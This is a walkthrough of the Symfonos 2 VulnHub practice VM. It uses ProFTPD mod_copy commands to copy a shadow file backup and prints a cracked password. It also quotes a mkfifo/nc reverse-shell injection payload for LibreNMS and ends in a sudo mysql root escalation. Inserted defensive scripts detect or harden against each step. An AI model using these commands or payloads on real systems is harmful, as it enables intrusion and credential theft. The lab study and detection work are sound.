SYMFONOS 2 Walkthrough — From Brute Force to Manual Exploitation to Make Titan Gods Cry — VulnHub — OSCP Practice

Nova
8 min read · Feb 16, 2021

Symfonos 2 is another vulnerable VM from the Symfonos series, listed in the NetSecFocus doc as an OSCP-like VM. In this writeup we see how overthinking a sophisticated exploit is sometimes not the way in, and how a weak password in an environment can give an easy way in through brute force. Then, for privilege escalation, we’ll see how to tunnel an internal application and use the knowledge from a public Metasploit module and its original Python exploit to carry out the manual exploitation that leads to RCE.

Preparation

  1. Download Symfonos 2 from VulnHub and boot it up in VMware or VirtualBox
  2. Your favorite haxor env; in this article I am using a Kali VM
  3. Find the IP address of the target VM; one way to do it is with nmap

nmap -sn 172.16.30.0/24

In this case my IP is 172.16.30.5

Tools

  • nmap
  • smbclient
  • ftp
  • nc
  • hashcat
  • ssh

Topics

  • ProFTPD 1.3.5 mod_copy manual exploit
  • Brute force attack on linux SHA512crypt (shadow file) using hashcat
  • Reading and understanding public exploits and using them to exploit a vulnerability manually

Enumeration

# nmap -p- -sC -sV -T4 -v -o tcp.nmap 172.16.30.5

Nmap scan report for 172.16.30.5
Host is up (0.0017s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp open http WebFS httpd 1.21
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m51s, median: 0s
| nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SYMFONOS2<00> Flags: <unique><active>
| SYMFONOS2<03> Flags: <unique><active>
| SYMFONOS2<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2021-02-14T12:53:22-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-14T18:53:22
|_ start_date: N/A

  • Port 21 is ProFTPD 1.3.5, which has the well-known mod_copy vulnerability we already saw on DIGITALWORLD.LOCAL: JOY
  • Port 22 (SSH) is open, so let’s see if we can log in when the time comes!
  • Port 80 is WebFS httpd version 1.21; we should look out for a working exploit
  • Ports 139 and 445 (smbd) are open, so let’s check if there is something interesting

Ports 139, 445 (SMBD)

Only the anonymous account is available, and it contains a backups folder with log.txt in it.

Maybe one of the most important traits to use while hacking is to look at the little details that generally hide from everyday eyes. Maybe the most important part of log.txt is its first line, which is very easy to miss: it tells us that root backed up the shadow file to some random place, /var/backups, for some reason.

Other things to learn from log.txt are the users available on the server and the path of the smb share, which is /home/aeolus/share.

Trying to exploit WebFS 1.21 from here didn’t work and felt like a waste of time.

Trying to exploit the server with the ProFTPD exploit found here

https://github.com/t0kx/exploit-CVE-2015-3306

would fail because it needs the webroot, which we don’t know, so it won’t work as-is. But if we look closer we can see that the exploit actually lets us run cpfr and cpto over ftp remotely, so with that said we can move stuff around on the server just by connecting to port 22.

At this point it feels like maybe brute force is the way in. I personally have a bad feeling when it comes to brute force; it feels like I’m missing something, but there is nothing wrong with it. The point to keep in mind is that brute-forcing the ftp or ssh ports directly on a live server is never a good idea, especially in a real-world situation! We won’t do it here either, since we can fetch the hash from the shadow file and brute-force it locally.

We have the path of the shadow file backup and an smb share, so let’s transfer it to the share and then get it from smb. We could also do the same with the /etc/passwd file, unshadow it and use John the Ripper, but I will just get the hash from the shadow file and run it through hashcat!

nc 172.16.30.5 21
site cpfr /var/backups/shadow.bak
site cpto /home/aeolus/share/shadow.bak

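The two SITE commands above are exactly what a defender should be alerting on: ProFTPD's mod_copy lets a client copy any path the daemon can read to any path it can write, and on 1.3.5 it did so before authentication (CVE-2015-3306). The detector below is an added example written for this walkthrough, not code from the page or from ProFTPD; it pairs each SITE CPFR with the following SITE CPTO from the same client and rates the copy. The log lines are constructed, and the ExtendedLog format they follow ('%h %l %u %t "%r" %s') is an assumption for the example.

```python
import re

# Constructed sample ProFTPD ExtendedLog lines. The LogFormat assumed here is
# '%h %l %u %t "%r" %s' (client host, ident, user, time, full command, status);
# this is an assumption for the example, not a format the page shows.
SAMPLE_LOG = """\
172.16.30.100 - anonymous [14/Feb/2021:12:50:01 -0600] "USER anonymous" 331
172.16.30.100 - anonymous [14/Feb/2021:12:50:09 -0600] "SITE CPFR /var/backups/shadow.bak" 350
172.16.30.100 - anonymous [14/Feb/2021:12:50:12 -0600] "SITE CPTO /home/aeolus/share/shadow.bak" 250
172.16.30.101 - aeolus [14/Feb/2021:12:51:30 -0600] "RETR notes.txt" 226
172.16.30.102 - anonymous [14/Feb/2021:12:52:00 -0600] "SITE CPFR /srv/ftp/pub/readme.txt" 350
172.16.30.102 - anonymous [14/Feb/2021:12:52:03 -0600] "SITE CPTO /srv/ftp/pub/readme2.txt" 250
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<cmd>[^"]*)" (?P<status>\d+)$'
)

# Source paths an FTP client should never be copying from.
SENSITIVE_PREFIXES = ("/etc/", "/var/backups/", "/root/")


def parse_log(text):
    """Yield one dict per well-formed line; silently skip anything else."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_mod_copy_abuse(text):
    """Pair each SITE CPFR with the next SITE CPTO from the same session
    (approximated by client host + user) and rate the resulting copy."""
    pending = {}   # (host, user) -> source path of the last CPFR
    findings = []
    for rec in parse_log(text):
        parts = rec["cmd"].split(maxsplit=2)
        if len(parts) < 3 or parts[0].upper() != "SITE":
            continue
        sub, arg = parts[1].upper(), parts[2]
        key = (rec["host"], rec["user"])
        if sub == "CPFR":
            pending[key] = arg
        elif sub == "CPTO" and key in pending:
            src = pending.pop(key)
            if src.startswith(SENSITIVE_PREFIXES):
                severity = "high"      # system file pulled into an FTP-reachable path
            elif rec["user"] == "anonymous":
                severity = "medium"    # unauthenticated use of mod_copy at all
            else:
                severity = "low"
            findings.append({"host": rec["host"], "user": rec["user"],
                             "time": rec["ts"], "src": src, "dst": arg,
                             "severity": severity})
    return findings


if __name__ == "__main__":
    for f in find_mod_copy_abuse(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['user']}@{f['host']} copied "
              f"{f['src']} -> {f['dst']} at {f['time']}")
```

Running it over the constructed log yields one high finding (the shadow backup landing in the smb share directory) and one medium finding (an anonymous copy inside the FTP tree). The fix on the server side is to upgrade past 1.3.5 or not load mod_copy at all; the detector is for the window before that happens.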
  • Read more about the shadow file
  • The shadow file hash type is sha512crypt, hashcat mode 1800

I copy the aeolus hash to a text file and form a hashcat command with the rockyou.txt wordlist

hashcat -m 1800 -a 0 -o pass.txt aeolusHash.txt -O /usr/share/wordlists/rockyou.txt

So hashcat cracked it in 16 seconds, pretty quick! :)

aeolus:sergioteamo
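The two things that made this crack possible are visible in the shadow data itself: which algorithm each account uses (the $6$ prefix is what maps to hashcat mode 1800 above) and the fact that a copy of the file sat somewhere world-readable. The following audit script is an added example written for this post, not the author's or any project's code; it classifies each password field, flags the entries a defender would care about, and checks a file listing for shadow copies readable by non-root users. The shadow excerpt and the file listing are constructed, and the hash strings in it are placeholders, not real hashes.

```python
import re

# crypt(3) hash id -> (algorithm, hashcat mode). The page cracks $6$ (sha512crypt)
# with hashcat mode 1800; the other two are hashcat's documented modes for them.
HASH_IDS = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
}

# Constructed shadow excerpt: the hash strings are made-up placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERHASHROOT:18600:0:99999:7:::
daemon:*:18600:0:99999:7:::
aeolus:$6$rounds=5000$abcd$PLACEHOLDERHASHAEOLUS:18600:0:99999:7:::
cronus:$1$xyz$PLACEHOLDERMD5:18600:0:99999:7:::
legacy::18600:0:99999:7:::
backupsvc:!$6$zzz$PLACEHOLDERLOCKED:18600:0:99999:7:::
"""


def classify_hash(field):
    """Return (status, algorithm, hashcat_mode, rounds) for one password field."""
    if field == "":
        return ("empty", None, None, None)          # login without any password
    if field.startswith(("!", "*")):
        return ("locked", None, None, None)         # disabled account
    m = re.match(r"^\$(?P<id>[^$]+)\$(?:rounds=(?P<rounds>\d+)\$)?", field)
    if not m:
        return ("unknown", None, None, None)        # e.g. legacy DES crypt
    algo, mode = HASH_IDS.get(m.group("id"), (f"crypt id {m.group('id')}", None))
    rounds = int(m.group("rounds")) if m.group("rounds") else None
    return ("active", algo, mode, rounds)


def audit_shadow(text):
    """Return (user, severity, note) tuples: passwordless logins, weak or
    unrecognised hash formats, and the algorithm of every crackable entry."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user = fields[0]
        status, algo, mode, rounds = classify_hash(fields[1])
        if status == "empty":
            findings.append((user, "critical", "no password set"))
        elif status == "unknown":
            findings.append((user, "high", "unrecognised/legacy hash format"))
        elif status == "active":
            severity = "high" if algo == "md5crypt" else "info"
            note = f"{algo} (hashcat -m {mode})" if mode else algo
            if rounds:
                note += f", rounds={rounds}"
            findings.append((user, severity, note))
    return findings


def exposed_shadow_copies(entries):
    """entries: iterable of (path, mode_bits, owner). Flags any shadow-like file
    that is world-readable or not owned by root, wherever it lives."""
    exposed = []
    for path, mode, owner in entries:
        if "shadow" not in path.rsplit("/", 1)[-1]:
            continue
        if owner != "root" or mode & 0o004:
            exposed.append(path)
    return exposed


if __name__ == "__main__":
    for user, severity, note in audit_shadow(SAMPLE_SHADOW):
        print(f"[{severity}] {user}: {note}")
    # Constructed listing: the backup the page finds lives outside /etc; the
    # 0644 mode is an assumption made for the example.
    listing = [("/etc/shadow", 0o640, "root"),
               ("/var/backups/shadow.bak", 0o644, "root")]
    print("exposed copies:", exposed_shadow_copies(listing))
```

Note that a correct /etc/shadow (0640, root:shadow) passes the exposure check while the stray .bak copy does not; that gap, rather than the hash algorithm, is what handed the hash to the attacker here. The password itself being in rockyou.txt is what made the 16-second crack possible.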

The fun part of brute force is that if it works you get to walk in through the freakin’ front door!

With some enumeration, like running lse.sh and walking the directories, I found out that apache is running and serving librenms locally from /opt/librenms via another account called cronus!

Checking out the apache configs to confirm!

So the next thing that draws attention is to have apache serve librenms to us by forwarding port 8080 on the server to port 8181 on our local Kali machine with ssh, so I run the following ssh command on Kali:

ssh -L 8181:localhost:8080 aeolus@172.16.30.5

and open librenms on my Kali.

Well, we already have the password for the aeolus account and it works on librenms too!

Trying to log in with other users returns an error.

I also tried to find the version of the installed LibreNMS, but it seems that because of a bad installation it shows the wrong number, and I couldn’t find exactly which version is installed, so we are kind of blind here.

http://127.0.0.1:8181/validate/

A simple Google search for LibreNMS showed a promising Remote Code Execution from 2018.

Exploit-DB has the Metasploit version of the exploit, but we can find the original exploit post in its references and read and understand exactly how it works from here and here.

CVE-2018-20434
https://www.exploit-db.com/exploits/46970
'References' =>
[
[ 'CVE', '2018-20434' ],
[ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ],
[ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ]
],

The original exploit post, written by Askar, is in Python 2 and accessible in a GitHub gist. To be real, in this case getting into fixing the Python 2 code and running it takes longer than reading the Python code and simulating the RCE injection ourselves, so let’s check out the Python exploit.

  • Of course it is possible to learn how the exploit works from the Metasploit Ruby code, but the original Python has a working payload that makes it faster in this case
https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d

Line 23 gives us a payload

'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #

On line 53 we learn that we need to create a new device with those fields filled in, and the payload goes into the community field.

Let’s add it

Now we have our nc -lvp 444 running in a terminal waiting for a connection; we should find out how to execute our payload, so let’s check out the exploit again to see how it does it.

On line 91, in the request parameters of the exploit function, we see that it tries to capture an snmpwalk and then sends it to /ajax_output.php. OK, we have a couple of keywords, so let’s find them in the web app.

Capture was hiding under that gear menu; after opening it and selecting the SNMP tab our payload calls back :)
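What the payload exploits is a classic OS command injection: the community string typed into the device form ends up inside a shell command line that runs snmpwalk, so a $( ... ) in it is executed and the trailing # comments out the rest of the line. The snippet below is an added example written for this post, not LibreNMS code and not the exploit; it contrasts the bug class (a command built as one string) with the hardened form (an allowlisted value passed as a separate argv element, never through a shell). The allowlist pattern, the host pattern and the hostile sample value are assumptions made for the example.

```python
import re
import shlex

# Allowlist for SNMP community strings. SNMP itself allows arbitrary octets, so this
# is a deliberately strict policy assumed for the example, not LibreNMS's own rule.
COMMUNITY_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")
HOST_RE = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")
# Characters that matter to /bin/sh; used only for triage, not as the control.
SHELL_META = re.compile(r"[$`;|&<>\n\r(){}]")


def looks_like_injection(value):
    """Cheap triage check for log review: does the value carry shell metacharacters?"""
    return SHELL_META.search(value) is not None


def unsafe_command_string(host, community):
    """The bug class: the user value is pasted into one string that a shell will
    parse. Shown for contrast only; nothing in this example executes it."""
    return f"snmpwalk -v 2c -c {community} {host} sysDescr.0"


def build_snmpwalk_argv(host, community, version="2c"):
    """Hardened form: validate both inputs, then return an argv list meant for
    subprocess.run(argv) with shell=False, so the community string is exactly one
    argument and no shell ever sees it."""
    if version not in ("1", "2c"):
        raise ValueError("unsupported SNMP version")
    if not HOST_RE.match(host):
        raise ValueError("invalid host")
    if not COMMUNITY_RE.match(community):
        raise ValueError("community string contains disallowed characters")
    return ["snmpwalk", "-v", version, "-c", community, host, "sysDescr.0"]


def is_acceptable(host, community):
    """Boolean wrapper around build_snmpwalk_argv for callers that only need a verdict."""
    try:
        build_snmpwalk_argv(host, community)
        return True
    except ValueError:
        return False


def quoted_for_logging(argv):
    """Render argv the way a reviewer expects to see it in an audit log."""
    return " ".join(shlex.quote(a) for a in argv)


if __name__ == "__main__":
    # Constructed value in the shape of the page's payload: a command substitution
    # followed by a comment marker that swallows the rest of the line.
    hostile = "$(id) #"
    print("triage flags hostile value:", looks_like_injection(hostile))
    print("unsafe string would read:  ", unsafe_command_string("10.0.0.5", hostile))
    print("hardened builder accepts it:", is_acceptable("10.0.0.5", hostile))
    print("hardened argv for a sane value:",
          quoted_for_logging(build_snmpwalk_argv("10.0.0.5", "public")))
```

The argv list is the real fix: even an unvalidated value placed in its own list element is handed to snmpwalk verbatim rather than interpreted. The allowlist on top is defence in depth and also gives an application a clean place to log and alert when something like the payload above is submitted.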

Got the shell, and it’s with the cronus account. The next step would be trying to get root, and the way shows up by checking for NOPASSWD sudo entries with sudo -l, which shows us that mysql can be run with sudo with NOPASSWD. A Google query like

mysql sudo privesc

returns a golden website called gtfobins.github.io:

https://gtfobins.github.io/gtfobins/mysql/

So let’s do as it suggests and get root!
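The root cause here is a sudoers entry that grants a shell-capable binary without a password, and that is something an administrator can find before an attacker does. The script below is an added example written for this post, not part of the page or of any tool; it parses sudoers specifications, honours the way NOPASSWD/PASSWD tags carry over to the commands that follow them, and rates each command against a small set of binaries GTFOBins documents as able to spawn a shell (mysql, the one used here, is in the set). The sudoers content is constructed: the mysql line mirrors what the page describes, the other lines are invented for the example.

```python
import os
import re

# Binaries GTFOBins documents as able to spawn a shell or run arbitrary commands.
# Subset chosen for the example; mysql is the one the page abuses via sudo.
SHELL_CAPABLE = {"mysql", "vim", "vi", "less", "more", "find", "awk",
                 "python", "python3", "perl", "bash", "sh", "env", "nmap"}

TAGS = {"NOPASSWD:", "PASSWD:", "SETENV:", "NOSETENV:", "EXEC:", "NOEXEC:"}
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

# user/group  host = (runas) [TAG:] cmd, [TAG:] cmd ...
SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)

# Constructed sudoers content: the mysql line mirrors what the page describes
# (mysql runnable as root without a password); the other lines are invented.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
cronus ALL=(ALL) NOPASSWD: /usr/bin/mysql
aeolus ALL=(ALL) NOPASSWD: /usr/bin/systemctl status apache2, PASSWD: /usr/bin/vim
"""


def split_commands(cmds):
    """Yield (nopasswd, command) pairs. A tag stays in force for the commands
    that follow it within the same specification, as sudoers semantics dictate."""
    nopasswd = False
    for raw in cmds.split(","):
        cmd = raw.strip()
        while True:
            head = cmd.split(maxsplit=1)
            if head and head[0].upper() in TAGS:
                if head[0].upper() == "NOPASSWD:":
                    nopasswd = True
                elif head[0].upper() == "PASSWD:":
                    nopasswd = False
                cmd = head[1].strip() if len(head) > 1 else ""
            else:
                break
        if cmd:
            yield nopasswd, cmd


def audit_sudoers(text):
    """Return one finding per risky command: shell-capable binaries (critical when
    NOPASSWD, high otherwise) and blanket ALL grants to non-root principals (info)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES) or "=" not in line:
            continue
        m = SPEC_RE.match(line)
        if not m or m.group("who") == "root":
            continue
        for nopasswd, cmd in split_commands(m.group("cmds")):
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                severity = "info"      # expected for admin groups; review membership
            elif binary in SHELL_CAPABLE:
                severity = "critical" if nopasswd else "high"
            else:
                continue
            findings.append({"line": lineno, "who": m.group("who"),
                             "runas": m.group("runas") or "root",
                             "command": cmd, "nopasswd": nopasswd,
                             "severity": severity})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"[{f['severity']}] line {f['line']}: {f['who']} may run "
              f"{f['command']} as {f['runas']} ({flag})")
```

On the constructed input the cronus/mysql line comes out as critical, which is the finding this box turns on; the vim grant is high because a password prompt only slows an attacker who already has the user's password, as was the case here. Sudo-to-root should go to wrapper scripts with fixed arguments, not to interactive programs with a shell escape.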

Post Exploitation

Walking around and checking the LibreNMS installation, you can also see the root flag :)

Conclusions

A weak password, an old ftp version, a random shadow file backup lying around, a buggy web app and a random binary with NOPASSWD led us to own Symfonos 2; those Titan Gods Aeolus and Cronus need to learn these lessons to be more secure!

Symfonos 2, other than giving practice with exploits, taught me two big lessons, and both of them are related to mindset:

  • If a public exploit doesn’t work and it feels like a dead end, it might actually be a dead end; better to move on and try brute forcing. After all, there is no patch for human stupidity and weak passwords are everywhere!
  • If you don’t know the version of an application and are not sure if it’s vulnerable to an available exploit, the best thing to do is to just test it and let it fail if it wants to. In this case it was the correct version and it worked!

Hope you enjoyed reading this!


Nova

Breaking stuff to learn them, learning stuff to break them!